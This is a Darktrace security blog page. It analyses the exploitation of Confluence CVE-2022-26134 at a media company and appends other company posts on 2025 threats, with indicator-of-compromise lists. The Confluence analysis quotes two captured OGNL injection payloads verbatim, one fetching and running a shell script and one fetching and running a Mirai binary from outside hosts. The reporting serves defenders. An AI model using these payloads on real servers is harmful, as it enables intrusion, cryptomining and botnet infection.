Blog
/
Network
/
June 12, 2022

Confluence CVE-2022-26134 Zero-Day: Detection & Guidance

Stay informed with Darktrace's blog on detection and guidance for the Confluence CVE-2022-26134 zero-day vulnerability. Learn how to protect your systems.
No items found.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
No items found.
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
12
Jun 2022

Summary

  • CVE-2022-26134 is an unauthenticated OGNL injection vulnerability which allows threat actors to execute arbitrary code on Atlassian Confluence Server or Data Centre products (not Cloud).
  • Atlassian has released several patches and a temporary mitigation in their security advisory. This has been consistently updated since the emergence of the vulnerability.
  • Darktrace detected and responded to an instance of exploitation in the first weekend of widespread exploits of this CVE.

Introduction

Looking forwards to 2022, the security industry expressed widespread concerns around third-party exposure and integration vulnerabilities.[1] Having already seen a handful of in-the-wild exploits against Okta (CVE-2022-22965) and Microsoft (CVE-2022-30190), the start of June has now seen another critical remote code execution (RCE) vulnerability affecting Atlassian’s Confluence range. Confluence is a popular wiki management and knowledge-sharing platform used by enterprises worldwide. This latest vulnerability (CVE-2022-26134) affects all versions of Confluence Server and Data Centre.[2] This blog will explore the vulnerability itself, an instance which Darktrace detected and responded to, and additional guidance for both the public at large and existing Darktrace customers.

Exploitation of this CVE occurs through an injection vulnerability which enables threat actors to execute arbitrary code without authentication. Injection-type attacks work by sending data to web applications in order to cause unintended results. In this instance, this involves injecting OGNL (Object-Graph Navigation Language) expressions to Confluence server memory. This is done by placing the expression in the URI of a HTTP request to the server. Threat actors can then plant a webshell which they can interact with and deploy further malicious code, without having to re-exploit the server. It is worth noting that several proofs-of-concept of this exploit have also been seen online.[3] As a widely known and critical severity exploit, it is being indiscriminately used by a range of threat actors.[4]

Atlassian advises that sites hosted on Confluence Cloud (run via AWS) are not vulnerable to this exploit and it is restricted to organizations running their own Confluence servers.[2]

Case study: European media organization

The first detected in-the-wild exploit for this zero-day was reported to Atlassian as an out-of-hours attack over the US Memorial Day weekend.[5] Darktrace analysts identified a similar instance of this exploit only a couple of days later within the network of a European media provider. This was part of a wider series of compromises affecting the account, likely involving multiple threat actors. The timing was also in line with the start of more widespread public exploitation attempts against other organizations.[6]

On the evening of June 3, Darktrace’s Enterprise Immune System identified a new text/x-shellscript download for the curl/7.61.1 user agent on a company’s Confluence server. This originated from a rare external IP address, 194.38.20[.]166. It is possible that the initial compromise came moments earlier from 95.182.120[.]164 (a suspicious Russian IP) however this could not be verified as the connection was encrypted. The download was shortly followed by file execution and outbound HTTP involving the curl agent. A further download for an executable from 185.234.247[.]8 was attempted but this was blocked by Antigena Network’s Autonomous Response. Despite this, the Confluence server then began serving sessions using the Minergate protocol on a non-standard port. In addition to mining, this was accompanied by failed beaconing connections to another rare Russian IP, 45.156.23[.]210, which had not yet been flagged as malicious on VirusTotal OSINT (Figures 1 and 2).[7][8]

Figures 1 and 2: Unrated VirusTotal pages for Russian IPs connected to during minergate activity and failed beaconing — Darktrace identification of these IP’s involvement in the Confluence exploit occurred prior to any malicious ratings being added to the OSINT profiles

Minergate is an open crypto-mining pool allowing users to add computer hashing power to a larger network of mining devices in order to gain digital currencies. Interestingly, this is not the first time Confluence has had a critical vulnerability exploited for financial gain. September 2021 saw CVE-2021-26084, another RCE vulnerability which was also taken advantage of in order to install crypto-miners on unsuspecting devices.[9]

During attempted beaconing activity, Darktrace also highlighted the download of two cf.sh files using the initial curl agent. Further malicious files were then downloaded by the device. Enrichment from VirusTotal (Figure 3) alongside the URIs, identified these as Kinsing shell scripts.[10][11] Kinsing is a malware strain from 2020, which was predominantly used to install another crypto-miner named ‘kdevtmpfsi’. Antigena triggered a Suspicious File Block to mitigate the use of this miner. However, following these downloads, additional Minergate connection attempts continued to be observed. This may indicate the successful execution of one or more scripts.

Figure 3: VirusTotal confirming evidence of Kinsing shell download

More concrete evidence of CVE-2022-26134 exploitation was detected in the afternoon of June 4. The Confluence Server received a HTTP GET request with the following URI and redirect location:

/${new javax.script.ScriptEngineManager().getEngineByName(“nashorn”).eval(“new java.lang.ProcessBuilder().command(‘bash’,’-c’,’(curl -s 195.2.79.26/cf.sh||wget -q -O- 195.2.79.26/cf.sh)|bash’).start()”)}/

This is a likely demonstration of the OGNL injection attack (Figures 3 and 4). The ‘nashorn’ string refers to the Nashorn Engine which is used to interpret javascript code and has been identified within active payloads used during the exploit of this CVE. If successful, a threat actor could be provided with a reverse shell for ease of continued connections (usually) with fewer restrictions to port usage.[12] Following the injection, the server showed more signs of compromise such as continued crypto-mining and SSL beaconing attempts.

Figures 4 and 5: Darktrace Advanced Search features highlighting initial OGNL injection and exploit time

Following the injection, a separate exploitation was identified. A new user agent and URI indicative of the Mirai botnet attempted to utilise the same Confluence vulnerability to establish even more crypto-mining (Figure 6). Mirai itself may have also been deployed as a backdoor and a means to attain persistency.

Figure 6: Model breach snapshot highlighting new user agent and Mirai URI

/${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(“wget 149.57.170.179/mirai.x86;chmod 777 mirai.x86;./mirai.x86 Confluence.x86”).getInputStream(),”utf-8”)).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(“X-Cmd-Response”,#a))}/

Throughout this incident, Darktrace’s Proactive Threat Notification service alerted the customer to both the Minergate and suspicious Kinsing downloads. This ensured dedicated SOC analysts were able to triage the events in real time and provide additional enrichment for the customer’s own internal investigations and eventual remediation. With zero-days often posing as a race between threat actors and defenders, this incident makes it clear that Darktrace detection can keep up with both known and novel compromises.

A full list of model detections and indicators of compromise uncovered during this incident can be found in the appendix.

Darktrace coverage and guidance

From the Kinsing shell scripts to the Nashorn exploitation, this incident showcased a range of malicious payloads and exploit methods. Although signature solutions may have picked up the older indicators, Darktrace model detections were able to provide visibility of the new. Models breached covering kill chain stages including exploit, execution, command and control and actions-on-objectives (Figure 7). With the Enterprise Immune System providing comprehensive visibility across the incident, the threat could be clearly investigated or recorded by the customer to warn against similar incidents in the future. Several behaviors, including the mass crypto-mining, were also grouped together and presented by AI Analyst to support the investigation process.

Figure 7: Device graph showing a cluster of model breaches on the Confluence Server around the exploit event

On top of detection, the customer also had Antigena in active mode, ensuring several malicious activities were actioned in real time. Examples of Autonomous Response included:

  • Antigena / Network / External Threat / Antigena Suspicious Activity Block
  • Block connections to 176.113.81[.]186 port 80, 45.156.23[.]210 port 80 and 91.241.19[.]134 port 80 for one hour
  • Antigena / Network / External Threat / Antigena Suspicious File Block
  • Block connections to 194.38.20[.]166 port 80 for two hours
  • Antigena / Network / External Threat / Antigena Crypto Currency Mining Block
  • Block connections to 176.113.81[.]186 port 80 for 24 hours

Darktrace customers can also maximise the value of this response by taking the following steps:

  • Ensure Antigena Network is deployed.
  • Regularly review Antigena breaches and set Antigena to ‘Active’ rather than ‘Human Confirmation’ mode (otherwise customers’ security teams will need to manually trigger responses).
  • Tag Confluence Servers with Antigena External Threat, Antigena Significant Anomaly or Antigena All tags.
  • Ensure Antigena has appropriate firewall integrations.

For each of these steps, more information can be found in the product guides on our Customer Portal

Wider recommendations for CVE-2022-26134

On top of Darktrace product guidance, there are several encouraged actions from the vendor:

  • Atlassian recommends updates to the following versions where this vulnerability has been fixed: 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1.
  • For those unable to update, temporary mitigations can be found in the formal security advisory.
  • Ensure Internet-facing servers are up-to-date and have secure compliance practices.

Appendix

Darktrace model detections (for the discussed incident)

  • Anomalous Connection / New User Agent to IP Without Hostname
  • Anomalous File / EXE from Rare External Location
  • Anomalous File / Script from Rare External
  • Anomalous Server Activity / Possible Denial of Service Activity
  • Anomalous Server Activity / Rare External from Server
  • Compromise / Crypto Currency Mining Activity
  • Compromise / High Volume of Connections with Beacon Score
  • Compromise / Large Number of Suspicious Failed Connections
  • Compromise / SSL Beaconing to Rare Destination
  • Device / New User Agent

IoCs

Thanks to Hyeongyung Yeom and the Threat Research Team for their contributions.

Footnotes

1. https://www.gartner.com/en/articles/7-top-trends-in-cybersecurity-for-2022

2. https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html

3. https://twitter.com/phithon_xg/status/1532887542722269184?cxt=HHwWgMCoiafG9MUqAAAA

4. https://twitter.com/stevenadair/status/1532768372911398916

5. https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence

6. https://www.cybersecuritydive.com/news/attackers-atlassian-confluence-zero-day-exploit/625032

7. https://www.virustotal.com/gui/ip-address/45.156.23.210

8. https://www.virustotal.com/gui/ip-address/176.113.81.186

9. https://securityboulevard.com/2021/09/attackers-exploit-cve-2021-26084-for-xmrig-crypto-mining-on-affected-confluence-servers

10. https://www.virustotal.com/gui/file/c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a

11. https://www.virustotal.com/gui/file/5d2530b809fd069f97b30a5938d471dd2145341b5793a70656aad6045445cf6d

12. https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134

No items found.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
No items found.

More in this series

No items found.

Blog

/

Network

/

August 5, 2025

2025 Cyber Threat Landscape: Darktrace’s Mid-Year Review

cyberseucity 2025 half year threat report Default blog imageDefault blog image

2025: Threat landscape in review

The following is a retrospective of the first six months of 2025, highlighting key findings across the threat landscape impacting Darktrace customers.

Darktrace observed a wide range of tactics during this period, used by various types of threat actors including advanced persistent threats (APTs), Malware-as-a-Service (MaaS) and Ransomware-as-a-Service (RaaS) groups.

Methodology

Darktrace’s Analyst team conduct investigations and research into threats facing organizations and security teams across our customer base.  This includes direct investigations with our 24/7 Security Operations Centre (SOC), via services such as Managed Detection and Response (MDR) and Managed Threat Detection, as well as broader cross-fleet research through our Threat Research function.

At the core of our research is Darktrace’s anomaly-based detection, which the Analyst team contextualizes and analyzes to provide additional support to customers and deepen our understanding of the threats they face.

Threat actors are incorporating AI into offensive operations

Threat actors are continuously evolving their tactics, techniques, and procedures (TTPs), posing an ongoing challenge to effective defense hardening. Increasingly, many threat actors are adopting AI, particularly large language models (LLMs), into their operations to enhance the scale, sophistication, and efficacy of their attacks.

The evolving functionality of malware, such as the recently reported LameHug malware by CERT-UA, which uses an open-source LLM, exemplifies this observation [1].

Threat landscape trends in 2025

Threat actors applying AI to Email attacks

LLMs present a clear opportunity for attackers to take advantage of AI and create effective phishing emails at speed. While Darktrace cannot definitively confirm the use of AI to create the phishing emails observed across the customer base, the high volume of phishing emails and notable shifts in tactic could potentially be explained by threat actors adopting new tooling such as LLMs.

  • The total number of malicious emails detected by Darktrace from January to May 2025 was over 12.6 million
  • VIP users continue to face significant threat, with over 25% of all phishing emails targeting these users in the first five months of 2025
  • QR code-based phishing emails have remained a consistent tactic, with a similar proportion observed in January-May 2024 and 2025. The highest numbers were observed in February 2025, with over 1 million detected in that month alone.
  • Shifts towards increased sophistication within phishing emails are emerging, with a year-on-year increase in the proportion of phishing emails containing either a high text volume or multistage payloads. In the first five months of 2025, 32% of phishing emails contained a high volume of text.

The increase in proportion of phishing emails with a high volume of text in particular could point towards threat actors leveraging LLMs to create phishing emails with large, but believable, text in an easy and efficient way.

The above email statistics are derived from analysis of monitored Darktrace / EMAIL model data for all customer deployments hosted in the cloud between January 1 and May 31, 2025.

Campaign Spotlight: Simple, Quick - ClickFix

An interesting technique Darktrace observed multiple times throughout March and April was ClickFix social engineering, which exploits the intersection between humans and technology to trick users into executing malicious code on behalf of the attacker.

  • While this technique has been around since 2024, Darktrace observed campaign activity in the first half of 2025 suggesting a resurgence.  
  • A range of threat actors – from APTs to MaaS and RaaS have adopted this technique to deliver secondary payloads, like information stealing malware.
  • Attackers use fraudulent or compromised legitimate websites to inject malicious plugins that masquerade as fake CAPTCHAs.
  • Targeted users believe they are completing human verification or resolving a website issue, unaware that they are being guided through a series of simple steps to execute PowerShell code on their system.
  • Darktrace observed campaign activity during the first half of 2025 across a range of sectors, including Government, Healthcare, Insurance, Retail and, Non-profit.

Not just AI: Automation is enabling Ransomware and SaaS exploitation

The rise of phishing kits like FlowerStorm and Mamba2FA, which enable phishing and abuse users’ trust by mimicking legitimate services to bypass multi-factor authentication (MFA), highlight how the barriers to entry for sophisticated attacks continue to fall, enabling new threat actors. Combined with Software-as-a-Service (SaaS) account compromise, these techniques make up a substantial portion of cybercriminal activity observed by Darktrace so far this year.

Credentials remain the weak link

A key theme across multiple cases of ransomware was threat actors abusing compromised credentials to gain initial entry into networks via:

  • Unauthorized access to internet-facing technology such as RDP servers and virtual private networks (VPNs).
  • Unauthorized access to SaaS accounts.

SaaS targeted ransomware is on the rise

The encryption of files within SaaS environments observed by Darktrace demonstrates a continued trend of ransomware actors targeting these platforms over traditional networks, potentially driven by a higher return on investment.

SaaS accounts are often less protected than traditional systems because of Single Sign-On (SSO).  Additionally, platforms like Salesforce often host sensitive data, including emails, financial records, customer information, and network configuration details. This stresses the need for robust identity management practices and continuous monitoring.

RaaS is adding complexity and speed to cyber attacks

RaaS has dominated the attack landscape, with groups like Qilin, RansomHub, and Lynx all appearing multiple times in cases across Darktrace’s customer base over the past six months. Detecting ransomware attacks before the encryption stage remains a significant challenge, particularly in RaaS operations where different affiliates often use varying techniques for initial entry and earlier stages of the attack. Darktrace’s recent analysis of Scattered Spider underscores the challenge of hardening defenses against such varying techniques.

CVE exploitation continues despite available patches

Darktrace has also observed ransomware gangs exploiting known Common Vulnerabilities and Exposures (CVEs), including the Medusa ransomware group’s use of the SimpleHelp vulnerabilities: CVE-2024-57727 and CVE-2024-57728 in March, despite patches being made available in January [2].

Misused tools + delayed patches = growing cyber risk

The exploitation of common remote management tools like SimpleHelp highlights the serious challenges defenders face when patch management cycles are suboptimal. As threat actors continue to abuse legitimate services for malicious purposes, the challenges facing defenders will only grow more complex.

Edge exploitation

It comes as no surprise that exploitation of internet-facing devices continued to feature prominently in Darktrace’s Threat Research investigations during the first half of 2025.

Observed CVE exploitation included:

Many of Darktrace’s observations of CVE exploitation so far in 2025 align with wider industry reporting, which suggests that Chinese-nexus threat actors were deemed to likely have exploited these technologies prior to public disclosure. In the case of CVE-2025-0994 - a vulnerability affecting Trimble Cityworks, an asset management system designed for use by local governments, utilities, airports, and public work agencies [3].

Darktrace observed signs of exploitation as early as January 19, well before vulnerability’s public disclosure on February 6 [4]. Darktrace’s early identification of the exploitation stemmed from the detection of a suspicious file download from 192.210.239[.]172:3219/z44.exe - later linked to Chinese-speaking threat actors in a campaign targeting the US government [5].

This case demonstrates the risks posed by the exploitation of internet-facing devices, not only those hosting more common technologies, but also software associated specifically tied to Critical National Infrastructure (CNI); a lucrative target for threat actors. This also highlights Darktrace’s ability to detect exploitation of internet-facing systems, even without a publicly disclosed CVE. Further examples of how Darktrace’s anomaly detection can uncover malicious activity ahead of public vulnerability disclosures can be found here.

New threats and returning adversaries

In the first half of 2025, Darktrace observed a wide range of threats, from sophisticated techniques employed by APT groups to large-scale campaigns involving phishing and information stealers.

BlindEagle (APT-C-36)

Among the observed APT activity, BlindEagle (APT-C-36) was seen targeting customers in Latin America (LATM), first identified in February, with additional cases seen as recently as June.

Darktrace also observed a customer targeted in a China-linked campaign involving the LapDogs ORB network, with activity spanning from December 2024 and June 2025. These likely nation-state attacks illustrate the continued adoption of cyber and AI capabilities into the national security goals of certain countries.

Sophisticated malware functionality

Further sophistication has been observed within specific malware functionality - such as the malicious backdoor Auto-Color, which has now been found to employ suppression tactics to cover its tracks if it is unable to complete its kill chain - highlighting the potential for advanced techniques across every layer of an attack.

Familiar foes

Alongside new and emerging threats, previously observed and less sophisticated tools, such as worms, Remote Access Trojans (RATs), and information stealers, continue to impact Darktrace customers.

The Raspberry Robin worm... First seen in 2021, has been repeatedly identified within Darktrace’s customer base since 2022. Most recently, Darktrace’s Threat Research team identified cases in April and May this year. Recent open-source intelligence (OSINT) reporting suggests that Raspberry Robin continues to evolve its role as an Initial Access Broker (IAB), paving the way for various attacks and remaining a concern [6].

RATs also remain a threat, with examples like AsyncRAT and Gh0st RAT impacting Darktrace customers.

In April multiple cases of MaaS were observed in Darktrace’s customer base, with information stealers Amadey and Stealc, as well as GhostSocks being distributed as a follow up payload after an initial Amadey infection.

Conclusion

As cyber threats evolve, attackers are increasingly harnessing AI to craft highly convincing email attacks, automating phishing campaigns at unprecedented scale and speed. This, coupled with rapid exploitation of vulnerabilities and the growing sophistication of ransomware gangs operating as organized crime syndicates, makes today’s threat landscape more dynamic and dangerous than ever. Cyber defenders collaborate to combat these threats – the coordinated takedown of Lumma Stealer in May was a notable win for both industry and law-enforcement [7], however OSINT suggests that this threat persists [8], and new threats will continue to arise.

Traditional security tools that rely on static rules or signature-based detection often struggle to keep pace with these fast-moving, adaptive threats. In this environment, anomaly-based detection tools are no longer optional—they are essential. By identifying deviations in normal user and system behavior, tools like Darktrace provide a proactive layer of defense capable of detecting novel and emerging threats, even those that bypass conventional security measures. Investing in anomaly-based detection is critical to staying ahead of attackers who now operate with automation, intelligence, and global coordination.

Credit to Emma Foulger (Global Threat Research Operations Lead), Nathaniel Jones (VP, Security & AI Strategy, Field CISO),  Eugene Chua (Principal Cyber Analyst & Analyst Team Lead), Nahisha Nobregas (Senior Cyber Analyst), Nicole Wong (Principal Cyber Analyst), Justin Torres (Senior Cyber Analyst), Matthew John (Director of Operations, SOC), Sam Lister (Specialist Security Researcher), Ryan Traill (Analyst Content Lead) and the Darktrace Incident Management team.

The information contained in this blog post is provided for general informational purposes only and represents the views and analysis of Darktrace as of the date of publication. While efforts have been made to ensure the accuracy and timeliness of the information, the cybersecurity landscape is dynamic, and new threats or vulnerabilities may have emerged since this report was compiled.

This content is provided “as is” and without warranties of any kind, either express or implied. Darktrace makes no representations or warranties regarding the completeness, accuracy, reliability, or suitability of the information, and expressly disclaims all warranties.

Nothing in this blog post should be interpreted as legal, technical, or professional advice. Users of this information assume full responsibility for any actions taken based on its content, and Darktrace shall not be liable for any loss or damage resulting from reliance on this material. Reference to any specific products, companies, or services does not constitute or imply endorsement, recommendation, or affiliation.

Appendices

Indicators of Compromise (IoCs)

IoC - Type - Description + Probability

LapDogs ORB network, December 2024-June 2025

www.northumbra[.]com – Hostname – Command and Control (C2) server

103.131.189[.]2 – IP Address - C2 server, observed December 2024 & June 2025

103.106.230[.]31 – IP Address - C2 server, observed December 2024

154.223.20[.]56 – IP Address – Possible C2 server, observed December 2024

38.60.214[.]23 – IP Address – Possible C2 server, observed January & February 2025

154.223.20[.]58:1346/systemd-log – URL – Possible ShortLeash payload, observed December 2024

CN=ROOT,OU=Police department,O=LAPD,L=LA,ST=California,C=US - TLS certificate details for C2 server

CVE-2025-0994, Trimble Cityworks exploitation, January 2025

192.210.239[.]172:3219/z44.exe – URL - Likely malicious file download

AsyncRAT, February-March 2025

windows-cam.casacam[.]net – Hostname – Likely C2 server

88.209.248[.]141 – IP Address – Likely C2 server

207.231.105[.]51 – IP Address – Likely C2 server

163.172.125[.]253 – IP Address – Likely C2 server

microsoft-download.ddnsfree[.]com – Hostname – Likely C2 server

95.217.34[.]113 – IP Address – Likely C2 server

vpnl[.]net – Hostname – Likely C2 server

157.20.182[.]16 – IP Address - Likely C2 server

185.81.157[.]19 – IP Address – Likely C2 server

dynamic.serveftp[.]net – IP Address – Likely C2 server

158.220.96.15 – IP Address – Likely C2 server

CVE-2024-57727 & CVE-2024-57728, SimpleHelp RMM exploitation, March 2025

213.183.63[.]41 – IP Address - C2 server

213.183.63[.]41/access/JWrapper-Windows64JRE-version.txt?time=3512082867 – URL - C2 server

213.183.63[.]41/access/JWrapper-Windows64JRE-00000000002-archive.p2.l2 – URL - C2 server

pruebas.pintacuario[.]mx – Hostname – Possible C2 server

144.217.181[.]205 – IP Address – Likely C2 server

erp.ranasons[.]com – Hostname – Possible destination for exfiltration

143.110.243[.]154 – IP Address – Likely destination for exfiltration

Blind Eagle, April-June 2025

sostenermio2024.duckdns[.]org/31agosto.vbs – URL – Possible malicious file download

Stealc, April 2025

88.214.48[.]93/ea2cb15d61cc476f[.]php – URL – C2 server

Amadey & GhostSocks, April 2025

195.82.147[.]98 – IP Address - Amadey C2 server

195.82.147[.]98/0Bdh3sQpbD/index.php – IP Address – Likely Amadey C2 activity

194.28.226.181 – IP Address – Likely GhostSocks C2 server

RaspberryRobin, May 2025

4j[.]pm – Hostname – C2 server

4xq[.]nl – Hostname – C2 server

8t[.]wf – Hostname – C2 server

Gh0stRAT, May 2025

lu.dssiss[.]icu  - Hostname – Likely C2 server

192.238.133[.]162:7744/1-111.exe – URL – Possible addition payload

8e9dec3b028f2406a8c546a9e9ea3d50609c36bb - SHA1 - Possible additional payload

f891c920f81bab4efbaaa1f7a850d484 - MD5 – Possible additional payload

192.238.133[.]162:7744/c3p.exe – URL - Possible additional payload

03287a15bfd67ff8c3340c0bae425ecaa37a929f - SHA1 - Possible additional payload

02aa02aee2a6bd93a4a8f4941a0e6310 - MD5 - Possible additional payload

192.238.133[.]162:7744/1-1111.exe – URL - Possible additional payload

1473292e1405882b394de5a5857f0b6fa3858fd1 - SHA1 - Possible additional payload

69549862b2d357e1de5bab899ec0c817 - MD5 - Possible additional payload

192.238.133[.]162:7744/1-25.exe – URL -  Possible additional payload

20189164c4cd5cac7eb76ba31d0bd8936761d7a7  - SHA1 - Possible additional payload

f42aa5e68b28a3f335f5ea8b6c60cb57 – MD5 - Possible additional payload

192.238.133[.]162:7744/Project1_se.exe – URL - Possible additional payload

fea1e30dfafbe9fa9abbbdefbcbe245b6b0628ad - SHA1 - Possible additional payload

5ea622c630ef2fd677868cbe8523a3d5 - MD5 - Possible additional payload

192.238.133[.]162:7744/Project1_se.exe - URL - Possible additional payload

aa5a5d2bd610ccf23e58bcb17d6856d7566d71b9  - SHA1 - Possible additional payload

9d33029eaeac1c2d05cf47eebb93a1d0 - MD5 - Possible additional payload

References and further reading

1.        https://cip.gov.ua/en/news/art28-atakuye-sektor-bezpeki-ta-oboroni-za-dopomogoyu-programnogo-zasobu-sho-vikoristovuye-shtuchnii-intelekt?utm_medium=email&_hsmi=113619842&utm_content=113619842&utm_source=hs_email

2.        https://www.s-rminform.com/latest-thinking/cyber-threat-advisory-medusa-and-the-simplehelp-vulnerability

3.        https://assetlifecycle.trimble.com/en/products/software/cityworks

4.     https://nvd.nist.gov/vuln/detail/CVE-2025-0994

5.     https://blog.talosintelligence.com/uat-6382-exploits-cityworks-vulnerability/

6.        https://www.silentpush.com/blog/raspberry-robin/

7.        https://blogs.microsoft.com/on-the-issues/2025/05/21/microsoft-leads-global-action-against-favored-cybercrime-tool/

8.     https://www.trendmicro.com/en_sg/research/25/g/lumma-stealer-returns.html

Related Darktrace investigations

-              ClickFix

-              FlowerStorm

-              Mamba 2FA

-              Qilin Ransomware

-              RansomHub Ransomware

-              RansomHub Revisited

-              Lynx Ransomware

-              Scattered Spider

-              Medusa Ransomware

-              Legitimate Services Malicious Intentions

-              CVE-2025-0282 and CVE-2025-0283 – Ivanti CS, PS and ZTA

-              CVE-2025-31324 – SAP Netweaver

-              Pre-CVE Threat Detection

-              BlindEagle (APT-C-36)

-              Raspberry Robin Worm

-              AsyncRAT

-              Amadey

-              Lumma Stealer

Continue reading
About the author
Emma Foulger
Global Threat Research Operations Lead

Blog

/

/

August 5, 2025

Darktrace's Cyber AI Analyst in Action: 4 Real-World Investigations into Advanced Threat Actors

Man looking at computer doing work, cybersecurity, AI, AI analystDefault blog imageDefault blog image

From automation to intelligence

There’s a lot of attention around AI in cybersecurity right now, similar to how important automation felt about 15 years ago. But this time, the scale and speed of change feel different.

In the context of cybersecurity investigations, the application of AI can significantly enhance an organization's ability to detect, respond to, and recover from incidents. It enables a more proactive approach to cybersecurity, ensuring a swift and effective response to potential threats.

At Darktrace, we’ve learned that no single AI technique can solve cybersecurity on its own. We employ a multi-layered AI approach, strategically integrating a diverse set of techniques both sequentially and hierarchically. This layered architecture allows us to deliver proactive, adaptive defense tailored to each organization’s unique environment.

Darktrace uses a range of AI techniques to perform in-depth analysis and investigation of anomalies identified by lower-level alerts, in particular automating Levels 1 and 2 of the Security Operations Centre (SOC) team’s workflow. This saves teams time and resources by automating repetitive and time-consuming tasks carried out during investigation workflows. We call this core capability Cyber AI Analyst.

How Darktrace’s Cyber AITM Analyst works

Cyber AI Analyst mimics the way a human carries out a threat investigation: evaluating multiple hypotheses, analyzing logs for involved assets, and correlating findings across multiple domains. It will then generate an alert with full technical details, pulling relevant findings into a single pane of glass to track the entire attack chain.

Learn more about how Cyber AI Analyst accomplishes this here:

This blog will highlight four examples where Darktrace’s agentic AI, Cyber AI Analyst, successfully identified the activity of sophisticated threat actors, including nation state adversaries. The final example will include step-by-step details of the investigations conducted by Cyber AI Analyst.

[related-resource]

Case 1: Cyber AI Analyst vs. ShadowPad Malware: East Asian Advanced Persistent Threat (APT)

In March 2025, Darktrace detailed a lengthy investigation into two separate threads of likely state-linked intrusion activity in a customer network, showcasing Cyber AI Analyst’s ability to identify different activity threads and piece them together.

The first of these threads...

occurred in July 2024 and involved a malicious actor establishing a foothold in the customer’s virtual private network (VPN) environment, likely via the exploitation of an information disclosure vulnerability (CVE-2024-24919) affecting Check Point Security Gateway devices.

Using compromised service account credentials, the actor then moved laterally across the network via RDP and SMB, with files related to the modular backdoor ShadowPad being delivered to targeted internal systems. Targeted systems went on to communicate with a C2 server via both HTTPS connections and DNS tunnelling.

The second thread of activity...

Which occurred several months earlier in October 2024, involved a malicious actor infiltrating the customer's desktop environment via SMB and WMI.

The actor used these compromised desktops to discriminately collect sensitive data from a network share before exfiltrating such data to a web of likely compromised websites.

For each of these threads of activity, Cyber AI Analyst was able to identify and piece together the relevant intrusion steps by hypothesizing, analyzing, and then generating a singular view of the full attack chain.

Cyber AI Analyst identifying and piecing together the various steps of the ShadowPad intrusion activity.
Figure 1: Cyber AI Analyst identifying and piecing together the various steps of the ShadowPad intrusion activity.
Cyber AI Analyst Incident identifying and piecing together the various steps of the data theft activity.
Figure 2: Cyber AI Analyst Incident identifying and piecing together the various steps of the data theft activity.

These Cyber AI Analyst investigations enabled a quicker understanding of the threat actor’s sequence of events and, in some cases, led to faster containment.

Read the full detailed blog on Darktrace’s ShadowPad investigation here!

Case 2: Cyber AI Analyst vs. Blind Eagle: South American APT

Since 2018, APT-C-36, also known as Blind Eagle, has been observed performing cyber-attacks targeting various sectors across multiple countries in Latin America, with a particular focus on Colombia.

In February 2025, Cyber AI Analyst provided strong coverage of a Blind Eagle intrusion targeting a South America-based public transport provider, identifying and correlating various stages of the attack, including tooling.

Cyber AI Analyst investigation linking likely Remcos C2 traffic, a suspicious file download, and eventual data exfiltration.Type image caption here (optional)
Figure 3: Cyber AI Analyst investigation linking likely Remcos C2 traffic, a suspicious file download, and eventual data exfiltration.Type image caption here (optional)
Cyber AI Analyst identifying unusual data uploads to another likely Remcos C2 endpoint and correlated each of the individual detections involved in this compromise, identifying them as part of a broader incident that encompassed C2 connectivity, suspicious downloads, and external data transfers.
Figure 4: Cyber AI Analyst identifying unusual data uploads to another likely Remcos C2 endpoint and correlated each of the individual detections involved in this compromise, identifying them as part of a broader incident that encompassed C2 connectivity, suspicious downloads, and external data transfers.

In this campaign, threat actors have been observed using phishing emails to deliver malicious URL links to targeted recipients, similar to the way threat actors have previously been observed exploiting CVE-2024-43451, a vulnerability in Microsoft Windows that allows the disclosure of a user’s NTLMv2 password hash upon minimal interaction with a malicious file [4].

In late February 2025, Darktrace observed activity assessed with medium confidence to be associated with Blind Eagle on the network of a customer in Colombia. Darktrace observed a device on the customer’s network being directed over HTTP to a rare external IP, namely 62[.]60[.]226[.]112, which had never previously been seen in this customer’s environment and was geolocated in Germany.

Read the full Blind Eagle threat story here!

Case 3: Cyber AI Analyst vs. Ransomware Gang

In mid-March 2025, a malicious actor gained access to a customer’s network through their VPN. Using the credential 'tfsservice', the actor conducted network reconnaissance, before leveraging the Zerologon vulnerability and the Directory Replication Service to obtain credentials for the high-privilege accounts, ‘_svc_generic’ and ‘administrator’.

The actor then abused these account credentials to pivot over RDP to internal servers, such as DCs. Targeted systems showed signs of using various tools, including the remote monitoring and management (RMM) tool AnyDesk, the proxy tool SystemBC, the data compression tool WinRAR, and the data transfer tool WinSCP.

The actor finally collected and exfiltrated several gigabytes of data to the cloud storage services, MEGA, Backblaze, and LimeWire, before returning to attempt ransomware detonation.

Figure 5: Cyber AI Analyst detailing its full investigation, linking 34 related Incident Events in a single pane of glass.

Cyber AI Analyst identified, analyzed, and reported on all corners of this attack, resulting in a threat tray made up of 34 Incident Events into a singular view of the attack chain.

Cyber AI Analyst identified activity associated with the following tactics across the MITRE attack chain:

  • Initial Access
  • Persistence
  • Privilege Escalation
  • Credential Access
  • Discovery
  • Lateral Movement
  • Execution
  • Command and Control
  • Exfiltration

Case 4: Cyber AI Analyst vs Ransomhub

Cyber AI Analyst presenting its full investigation into RansomHub, correlating 38 Incident Events.
Figure 6: Cyber AI Analyst presenting its full investigation into RansomHub, correlating 38 Incident Events.

A malicious actor appeared to have entered the customer’s network their VPN, using a likely attacker-controlled device named 'DESKTOP-QIDRDSI'. The actor then pivoted to other systems via RDP and distributed payloads over SMB.

